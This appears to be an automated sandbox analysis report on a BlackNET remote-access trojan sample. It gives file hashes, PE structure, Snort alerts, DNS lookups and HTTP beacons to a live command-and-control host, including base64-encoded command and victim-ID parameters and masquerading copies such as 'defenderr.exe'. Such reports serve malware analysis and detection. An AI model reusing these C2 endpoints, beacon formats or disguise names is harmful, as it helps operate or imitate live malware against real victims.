C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3lu3xtil.iru.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3te1404m.s5h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\Desktop\svchosts.exe

Download File

Process:	C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	17408
Entropy (8bit):	5.113930658044601
Encrypted:	false
SSDEEP:	384:nf93O1/fA16ZOKOc2Lb453gvvFZxbxlH7W98ZdW:f5O1/JCV9
MD5:	89DD6E72358A669B7D6E2348307A7AF7
SHA1:	0DB348F3C6114A45D71F4D218E0E088B71C7BB0A
SHA-256:	AD34794058212006AE974FCC6A0242598E6D020F08044439E3512773CD402B7E
SHA-512:	93B8A47686D7491281A0809B138A6244A535302BA0D6B2146849E9888632C72B6223AE8EB7A24F1006AAF57AB947A8F43719CFF4837DF559E7BF42F52C63856B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 72%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: a.exe, Detection: malicious, Browse Filename: B30EEBF734354F55373978E395C912393F3C674AAA471.exe, Detection: malicious, Browse Filename: E6507F36045C13DEE736BEA44D61E90169EA69DE61E9D.exe, Detection: malicious, Browse Filename: PopbBQv0MC.exe, Detection: malicious, Browse Filename: Win_Updates.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7..^.................4...........R... ...`....@.. ..............................by....@.................................HR..S....................................`............................................... ............... ..H............text....2... ...4.................. ..`.sdata..8....`.......8..............@....rsrc................:..............@..@.reloc...............B..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.286908044969979
Encrypted:	false
SSDEEP:	12288:n/jK0Th312aptTSP2C/doN515xzNu2R+GrNHk+DVl/IQG6bnv/OmaaM:LK0Th312aptTSP+HL
MD5:	06917F2712311DA00D0F75FC107A27A8
SHA1:	AE37C75148AC2205FDA16265E6998A4512505A36
SHA-256:	4B787653BBC5BD89CFB6E9772B358987EC81167A0DF63342F3341995DBC4047A
SHA-512:	7BEA825402B3205E4228E18A4D6EE428A2A3491504E366548518D8A619CDF4F582F052F0B2377271D35C2222A1396A1B877EC4EA4FB51495A7176435BAC32E83
Malicious:	false
Preview:	regfi...i...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.A............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.978372519881584
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
File size:	187904
MD5:	d677c626953c9ba17b3d094a83b1048e
SHA1:	bf78af289038b4c088b7679a3d08627dac4883bd
SHA256:	4d178e10389731a660d8dc1240f6d64723aae55ad953150bed2520d2c39e6644
SHA512:	a6089df6a109ce91644e338b98ee9de96fa1a13040315e05ccac4afd362233cbbb8057cf5bb66de606c9231059d5bde29ab6cd92fb811bf086057a311fc60418
SSDEEP:	1536:XgzTtxCCkI7Yq0GzAc4xYEwbJbSDzlkW3zzxV/A8:QzTeLuzAGbJUGWv/A8
TLSH:	C00475D15357F8C9C2E0353856321B82A27A68333CA9DC1F55C2693EA62C1936727B7F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y.-a............................nL... ...`....@.. .......................@............@................................

File Icon


Icon Hash:	cac26b6a6a6a0b4d

Static PE Info

General

Entrypoint:	0x414c6e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x612DDF79 [Tue Aug 31 07:51:21 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14c1c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16000	0x1ab98	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x32000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x12c74	0x12e00	False	0.9254190811258278	data	7.869095226720743	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x16000	0x1ab98	0x1ac00	False	0.05845684871495327	data	3.6813850283371723	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x32000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x162b0	0x81a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.7849566055930569
RT_ICON	0x16acc	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	0.01875073938246776
RT_ICON	0x272f4	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	0.04481577704298536
RT_ICON	0x2b51c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.070850622406639
RT_ICON	0x2dac4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.13086303939962476
RT_ICON	0x2eb6c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.32269503546099293
RT_ICON	0x2efd4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.020872420262664164
RT_ICON	0x3007c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.05851063829787234
RT_GROUP_ICON	0x304e4	0x5a	data	0.7333333333333333
RT_GROUP_ICON	0x30540	0x68	data	0.7019230769230769
RT_VERSION	0x305a8	0x404	data	0.4153696498054475
RT_MANIFEST	0x309ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3141.8.197.4249705802029179 06/18/23-09:33:20.041349	TCP	2029179	ET TROJAN Win32/BlackNET CnC Keep-Alive	49705	80	192.168.2.3	141.8.197.42
192.168.2.3141.8.197.4249715802029179 06/18/23-09:34:06.047506	TCP	2029179	ET TROJAN Win32/BlackNET CnC Keep-Alive	49715	80	192.168.2.3	141.8.197.42

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 18, 2023 09:33:19.594264984 CEST	49704	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:33:19.676801920 CEST	80	49704	141.8.197.42	192.168.2.3
Jun 18, 2023 09:33:19.676934004 CEST	49704	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:33:19.677746058 CEST	49704	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:33:19.760065079 CEST	80	49704	141.8.197.42	192.168.2.3
Jun 18, 2023 09:33:19.760315895 CEST	80	49704	141.8.197.42	192.168.2.3
Jun 18, 2023 09:33:19.760816097 CEST	80	49704	141.8.197.42	192.168.2.3
Jun 18, 2023 09:33:19.761931896 CEST	49704	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:33:19.768297911 CEST	49704	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:33:19.850698948 CEST	80	49704	141.8.197.42	192.168.2.3
Jun 18, 2023 09:33:19.964759111 CEST	49705	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:33:20.040775061 CEST	80	49705	141.8.197.42	192.168.2.3
Jun 18, 2023 09:33:20.041141987 CEST	49705	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:33:20.041348934 CEST	49705	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:33:20.117315054 CEST	80	49705	141.8.197.42	192.168.2.3
Jun 18, 2023 09:33:20.117670059 CEST	80	49705	141.8.197.42	192.168.2.3
Jun 18, 2023 09:33:20.117786884 CEST	80	49705	141.8.197.42	192.168.2.3
Jun 18, 2023 09:33:20.121710062 CEST	49705	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:33:20.126624107 CEST	49705	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:33:20.202399015 CEST	80	49705	141.8.197.42	192.168.2.3
Jun 18, 2023 09:34:04.863471031 CEST	49714	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:34:04.942805052 CEST	80	49714	141.8.197.42	192.168.2.3
Jun 18, 2023 09:34:04.942961931 CEST	49714	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:34:04.957701921 CEST	49714	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:34:05.036911011 CEST	80	49714	141.8.197.42	192.168.2.3
Jun 18, 2023 09:34:05.036952972 CEST	80	49714	141.8.197.42	192.168.2.3
Jun 18, 2023 09:34:05.037125111 CEST	80	49714	141.8.197.42	192.168.2.3
Jun 18, 2023 09:34:05.037230015 CEST	49714	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:34:05.038059950 CEST	49714	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:34:05.117563963 CEST	80	49714	141.8.197.42	192.168.2.3
Jun 18, 2023 09:34:05.964056969 CEST	49715	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:34:06.047127962 CEST	80	49715	141.8.197.42	192.168.2.3
Jun 18, 2023 09:34:06.047261000 CEST	49715	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:34:06.047506094 CEST	49715	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:34:06.129853010 CEST	80	49715	141.8.197.42	192.168.2.3
Jun 18, 2023 09:34:06.130040884 CEST	80	49715	141.8.197.42	192.168.2.3
Jun 18, 2023 09:34:06.130160093 CEST	80	49715	141.8.197.42	192.168.2.3
Jun 18, 2023 09:34:06.130245924 CEST	49715	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:34:06.130481005 CEST	49715	80	192.168.2.3	141.8.197.42
Jun 18, 2023 09:34:06.215262890 CEST	80	49715	141.8.197.42	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 18, 2023 09:33:19.489423990 CEST	60625	53	192.168.2.3	8.8.8.8
Jun 18, 2023 09:33:19.563700914 CEST	53	60625	8.8.8.8	192.168.2.3
Jun 18, 2023 09:34:04.810761929 CEST	51139	53	192.168.2.3	8.8.8.8
Jun 18, 2023 09:34:04.850717068 CEST	53	51139	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 18, 2023 09:33:19.489423990 CEST	192.168.2.3	8.8.8.8	0x51d5	Standard query (0)	f0575824.xsph.ru	A (IP address)	IN (0x0001)	false
Jun 18, 2023 09:34:04.810761929 CEST	192.168.2.3	8.8.8.8	0xb576	Standard query (0)	f0575824.xsph.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 18, 2023 09:33:19.563700914 CEST	8.8.8.8	192.168.2.3	0x51d5	No error (0)	f0575824.xsph.ru		141.8.197.42	A (IP address)	IN (0x0001)	false
Jun 18, 2023 09:34:04.850717068 CEST	8.8.8.8	192.168.2.3	0xb576	No error (0)	f0575824.xsph.ru		141.8.197.42	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

f0575824.xsph.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49704	141.8.197.42	80	C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Timestamp	kBytes transferred	Direction	Data
Jun 18, 2023 09:33:19.677746058 CEST	91	OUT	GET /blacknet HTTP/1.1 Host: f0575824.xsph.ru Connection: Keep-Alive
Jun 18, 2023 09:33:19.760315895 CEST	91	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sun, 18 Jun 2023 07:33:19 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49705	141.8.197.42	80	C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Timestamp	kBytes transferred	Direction	Data
Jun 18, 2023 09:33:20.041348934 CEST	92	OUT	GET /blacknet/receive.php?command=VW5pbnN0YWxs&vicID=SGFjS2VkXzdGOTRDM0I1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Host: f0575824.xsph.ru
Jun 18, 2023 09:33:20.117670059 CEST	93	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sun, 18 Jun 2023 07:33:20 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49714	141.8.197.42	80	C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Timestamp	kBytes transferred	Direction	Data
Jun 18, 2023 09:34:04.957701921 CEST	222	OUT	GET /blacknet HTTP/1.1 Host: f0575824.xsph.ru Connection: Keep-Alive
Jun 18, 2023 09:34:05.036952972 CEST	223	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sun, 18 Jun 2023 07:34:04 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49715	141.8.197.42	80	C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Timestamp	kBytes transferred	Direction	Data
Jun 18, 2023 09:34:06.047506094 CEST	223	OUT	GET /blacknet/receive.php?command=VW5pbnN0YWxs&vicID=SGFjS2VkXzdGOTRDM0I1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Host: f0575824.xsph.ru
Jun 18, 2023 09:34:06.130040884 CEST	224	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sun, 18 Jun 2023 07:34:06 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Target ID:	0
Start time:	09:33:08
Start date:	18/06/2023
Path:	C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Imagebase:	0x870000
File size:	187904 bytes
MD5 hash:	D677C626953C9BA17B3D094A83B1048E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Show Windows behavior

Target ID:	1
Start time:	09:33:17
Start date:	18/06/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" Get-MpPreference -verbose
Imagebase:	0x7ff606160000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	09:33:17
Start date:	18/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	5
Start time:	09:33:26
Start date:	18/06/2023
Path:	C:\ProgramData\Microsoft\MyClient\defenderr.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\MyClient\defenderr.exe"
Imagebase:	0xc70000
File size:	187904 bytes
MD5 hash:	D677C626953C9BA17B3D094A83B1048E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
